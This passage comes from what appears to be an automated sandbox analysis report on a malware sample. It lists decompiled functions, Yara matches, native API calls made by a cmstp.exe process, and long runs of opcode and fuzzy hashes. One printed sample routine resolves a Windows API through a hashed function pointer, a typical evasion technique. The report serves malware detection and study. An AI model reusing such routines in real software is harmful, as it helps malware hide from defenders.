                                                                          			E004185D6(void* __ebx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _t14;
				intOrPtr* _t35;
				void* _t37;

				if(__ebx - 1 >= 0) {
					_t14 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
					return _t14;
				} else {
					_t15 = _a4;
					_t3 = _t15 + 0xc88; // 0xd8c
					_t35 = _t3;
					E00418DC0(_a4, _t35,  *((intOrPtr*)(_t15 + 0xa14)), 0, 0x39);
					return  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, 0x78edac45, _t37);
				}
			}






                                                                          0x004185d9
                                                                          0x00418660
                                                                          0x00418664
                                                                          0x004185db
                                                                          0x004185e3
                                                                          0x004185f2
                                                                          0x004185f2
                                                                          0x004185fa
                                                                          0x00418620
                                                                          0x00418620

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction ID: c1232d1a8e4e99d6700dad9e163c6271c5d2c8c15c6dedabe14bd1bef052e82d
                                                                          • Opcode Fuzzy Hash: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction Fuzzy Hash: 15D0C9B5200518AF8B04EE4AD8908AB73A9AF882247258659FC0997301CA31ED268AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                          • Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
                                                                          • Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                          • Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 004162B4, Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88e0cd9bbf4904eb1011bb4b51c7b60bec9a24336ad4e72f8cb6031bf7ce0226
                                                                          • Instruction ID: bab2ec68b729f3880b2902b80368e3dc9c664114894f48a5505ef08b9db17af5
                                                                          • Opcode Fuzzy Hash: 88e0cd9bbf4904eb1011bb4b51c7b60bec9a24336ad4e72f8cb6031bf7ce0226
                                                                          • Instruction Fuzzy Hash: F8D0A73396A29547C3114D5868464F7FB64A54303BB4013DEDD98A60D2D3018212C6DE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406A9B, Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 400603f45bf8f249d18891f68da473841082a73bcd72171d17145baa968528ba
                                                                          • Instruction ID: 42212950729f972be36f0539311558b516623c630c4cac4f68a7951c03aa4294
                                                                          • Opcode Fuzzy Hash: 400603f45bf8f249d18891f68da473841082a73bcd72171d17145baa968528ba
                                                                          • Instruction Fuzzy Hash: 06C09B23F1615445D5115D6D7C42174F7649747564D046397EC5C731125482DC6107CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB98A0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                          • Instruction ID: 3d5af1a720ec26eb11f3ece172e70270e194f940f542ea6ebd1e22bb9b08fef6
                                                                          • Opcode Fuzzy Hash: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                          • Instruction Fuzzy Hash: 4890026130500402D30261694414B060009D7D1385F92C036E1514595D86658953F172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9820, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                          • Instruction ID: 6c53177ca3f6b5fae878caef4134b5b9331b09dcc816946c058a6313d29f18d7
                                                                          • Opcode Fuzzy Hash: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                          • Instruction Fuzzy Hash: A290027124500402D34171694404B060009A7D0381F92C036A0514594E86958A56FAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABB040, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                          • Instruction ID: f75ae7e81ae6304e22298c47aa7224f5cf6bbeb007eda64a760a0272a49d338e
                                                                          • Opcode Fuzzy Hash: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                          • Instruction Fuzzy Hash: 7E9002A1605140434740B16948049065015A7E1341392C135A05445A0C86A88855E2A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB99D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                          • Instruction ID: 3eb2ec0cdb3d3ec0676796c684d826ff344240f7868fec35be3edd68acdfbfe3
                                                                          • Opcode Fuzzy Hash: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                          • Instruction Fuzzy Hash: 1F9002A121500042D30461694404B06004597E1341F52C036A2244594CC5698C61A165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9950, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                          • Instruction ID: 35f0725ba9862cabd772c52fcb1dbbb05b1879467df495e1ff68a05124c4ab35
                                                                          • Opcode Fuzzy Hash: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                          • Instruction Fuzzy Hash: 319002A120540403D34065694804B07000597D0342F52C035A2154595E8A698C51B175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9A80, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                          • Instruction ID: 7029dda305442e1b1190bc795444c3c4ee646d59978d335548847ba5849de1c5
                                                                          • Opcode Fuzzy Hash: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                          • Instruction Fuzzy Hash: D990026120544442D34062694804F0F410597E1342F92C03DA4246594CC9558855A761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9A10, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                          • Instruction ID: 5138a3ffa0ff4b38a94ddc0af292694174841e4730c3d11c0ebdd8b2c77e2124
                                                                          • Opcode Fuzzy Hash: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                          • Instruction Fuzzy Hash: C190027120540402D30061694808B47000597D0342F52C035A5254595E86A5C891B571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABA3B0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                          • Instruction ID: 062e2342a8216098ddeeb0e5edddf36eabd6e7aafbff9f98a6e913044de104b5
                                                                          • Opcode Fuzzy Hash: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                          • Instruction Fuzzy Hash: F490027120544002D34071698444B0B5005A7E0341F52C435E0515594C86558856E261
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9B00, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                          • Instruction ID: 35fa8ce29d23dc4a31ce47c37f4a28a7283f933d93ffa76d82c218abe2352bf5
                                                                          • Opcode Fuzzy Hash: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                          • Instruction Fuzzy Hash: 2590026124500802D34071698414B070006D7D0741F52C035A0114594D86568965B6F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB95F0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                          • Instruction ID: ed6be8a705f1f99ec2925b122e226e47ca715ea7f66ea622bddd2c9e1b2107ba
                                                                          • Opcode Fuzzy Hash: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                          • Instruction Fuzzy Hash: BD90027120500802D30461694804B86000597D0341F52C035A6114695E96A58891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9520, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                          • Instruction ID: a40986a61de035ca1deb007017e058ca5b8c1f0627919953ee223e5ded9b15a5
                                                                          • Opcode Fuzzy Hash: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                          • Instruction Fuzzy Hash: 239002E1205140924700A2698404F0A450597E0341B52C03AE11445A0CC5658851E175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABAD30, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                          • Instruction ID: 5b81e486b5d4539877e3a6433a19d3b6de9dc8f3256072923b218d431a09c67b
                                                                          • Opcode Fuzzy Hash: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                          • Instruction Fuzzy Hash: 6C900271A0900012934071694814B464006A7E0781B56C035A0604594C89948A55A3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9560, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                          • Instruction ID: 6c2f8a19244e812241081d30dcb70f43dcdff8f02f24bb6a79f8744fdf53db68
                                                                          • Opcode Fuzzy Hash: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                          • Instruction Fuzzy Hash: 3F900265225000020345A5690604A0B0445A7D6391392C039F15065D0CC6618865A361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB96D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                          • Instruction ID: fb575ff8cfa5ee648c23addf5987a082e8a26b5af66340ad18b81a3f79ad7e67
                                                                          • Opcode Fuzzy Hash: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                          • Instruction Fuzzy Hash: 5490027120500842D30061694404F46000597E0341F52C03AA0214694D8655C851B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9610, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                          • Instruction ID: 89d22fcf2b6f08c97e692b5398c26ac0dee9abfa238ef4b11e3b99c0f9003f80
                                                                          • Opcode Fuzzy Hash: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                          • Instruction Fuzzy Hash: 2F90027160900802D35071694414B46000597D0341F52C035A0114694D87958A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9650, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                          • Instruction ID: 48db54c47d282b32d5aa0cc7158c4e10406cd6b064d8023c1ad0eddd854dcc2a
                                                                          • Opcode Fuzzy Hash: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                          • Instruction Fuzzy Hash: 6790027120904842D34071694404F46001597D0345F52C035A01546D4D96658D55F6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9730, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                          • Instruction ID: 133f25e20edba5eec6c66537ff6acf3799fd51e7aafa144d3ac0cf8f79806eb1
                                                                          • Opcode Fuzzy Hash: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                          • Instruction Fuzzy Hash: F790026160900402D34071695418B06001597D0341F52D035A0114594DC6998A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABA710, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                          • Instruction ID: ad979abee1b31fb37d86e7209d2f09f58b23bb9b8142aaba8bc4d94e1f0f0964
                                                                          • Opcode Fuzzy Hash: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                          • Instruction Fuzzy Hash: DE900271305000529700A6A95804F4A410597F0341B52D039A4104594C85948861A161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9760, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
                                                                          • Instruction ID: b5fedd925999d55cdd36c154a349704c6730e4f8af98a0ff374cffabcdc2c0b5
                                                                          • Opcode Fuzzy Hash: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
                                                                          • Instruction Fuzzy Hash: B490027120500403D30061695508B07000597D0341F52D435A0514598DD6968851B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                          • Instruction ID: 2820e33edad96c8073d441cf8b467349140a2c2c5665985fd971a08317af0b9f
                                                                          • Opcode Fuzzy Hash: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                          • Instruction Fuzzy Hash: 0990026120904442D30065695408F06000597D0345F52D035A11545D5DC6758851F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABA770, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                          • Instruction ID: 839f87062b0c8f29c0d1ed1583676903a87c8895062ab4ada9e5a5374e6dafb7
                                                                          • Opcode Fuzzy Hash: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                          • Instruction Fuzzy Hash: C790027520904442D70065695804F87000597D0345F52D435A05145DCD86948861F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9670, Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: fffe924e3715e38202a0e3d92c7aa9f816dad169290f16defe818bb41ed2bb3a
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00B0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x00b0fdda
                                                                          0x00b0fde2
                                                                          0x00b0fde5
                                                                          0x00b0fdec
                                                                          0x00b0fdfa
                                                                          0x00b0fdff
                                                                          0x00b0fe0a
                                                                          0x00b0fe0f
                                                                          0x00b0fe17
                                                                          0x00b0fe1e
                                                                          0x00b0fe19
                                                                          0x00b0fe19
                                                                          0x00b0fe19
                                                                          0x00b0fe20
                                                                          0x00b0fe21
                                                                          0x00b0fe22
                                                                          0x00b0fe25
                                                                          0x00b0fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                          • Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
                                                                          • Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                          • Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: cmstp.exe PID: 4064 Parent PID: 3388 cmstp.exeCOMMON

                                                                          Executed Functions

                                                                          Function 004181C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00413B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413B97,007A002E,00000000,00000060,00000000,00000000), ref: 0041820D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(0=A,?,?,00413D30,00000000,FFFFFFFF), ref: 00418315
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: 0=A
                                                                          • API String ID: 3535843008-2954429754
                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00413A11,?,?,?,?,00413A11,FFFFFFFF,?,R=A,?,00000000), ref: 004182B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
